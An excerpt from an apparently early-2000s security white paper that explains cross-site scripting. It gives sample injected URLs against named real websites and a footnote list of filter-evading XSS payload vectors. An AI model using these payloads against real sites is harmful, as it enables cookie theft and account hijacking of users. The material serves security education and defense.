XSS ATTACK!

Cross-Site Scripting (XSS) vulnerabilities are very often misunderstood and not given the due
concern and attention they deserve by vendors. XSS is the preferred acronym for “Cross-Site
Scripting” simply to minimize the

Read more
confusion with Cascading Style Sheets (CSS). Simply put, a
web application vulnerable to XSS allows a user to inadvertently send malicious data to him or
herself through that application.
Attackers often perform XSS exploitation by crafting malicious
URLs and tricking users into clicking on them. These links cause client side scripting languages
(VBScript, JavaScript, etc.) of the attacker’s choice to execute on the victim’s browser. XSS
vulnerabilities are caused by a failure in the web application to properly validate user input.
The following are a few actual XSS vulnerability exploits with embedded JavaScript
(highlighted) able to execute on the user’s browser with the same permissions of the vulnerable
website domain7:
• http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft
.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script
>
• http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script
>alert(‘Test’);</script>
• http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</s
cript>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
• http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=%
22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E.

The most common web components that fall victim to XSS vulnerabilities include CGI scripts,
search engines, interactive bulletin boards, and custom error pages with poorly written input
validation routines. Additionally, a victim doesn’t necessarily have to click on a link; XSS code
can also be made to load automatically in an HTML e-mail with certain manipulations of the
IMG or IFRAME HTML tags (much like the Badtrans worm). There are numerous ways to
inject JavaScript code into URLs for the purpose of a XSS attack10.
The “Cross-Site” part of XSS refers to the security restrictions that a web browser usually places
on data (i.e. cookies, dynamic HTML page attributes, etc.) associated with a dynamic website.
By causing the user’s browser to execute rogue script snippets under the same permissions of the
web application domain, an attacker can bypass the traditional Document Object Model (DOM)
security restrictions which can result not only in cookie theft but account hijacking, changing of
web application account settings, spreading of a webmail worm, etc11. The DOM12 is a
conceptual framework for allowing scripts to make changes to dynamic web content and
10 a sampling of XSS examples taken from http://online.securityfocus.com/archive/1/272037/2002-05-
09/2002-05-15/0:
<a href="javas&#99;ript&#35;[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<s&#99;ript>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>
11 see http://www.cgisecurity.com/articles/xss-faq.shtml
12 http://www.w3.org/DOM
 iDEFENSE Inc. iALERT White Paper – PUBLIC RELEASE VERSION
normally is implemented using the web browser’s security settings, to prevent such things as
malicious websites from retrieving cookies values from other domains.
As mentioned previously, cookie stealing is only one of the many implications of XSS attacks.
By subverting client side scripting languages, an attacker can take full control over the victim’s
browser. This also has more insidious ramifications against users of a web application domain if
the attacker chooses to exploit a vulnerability in the browser in order to gain access to the
underlying operating system.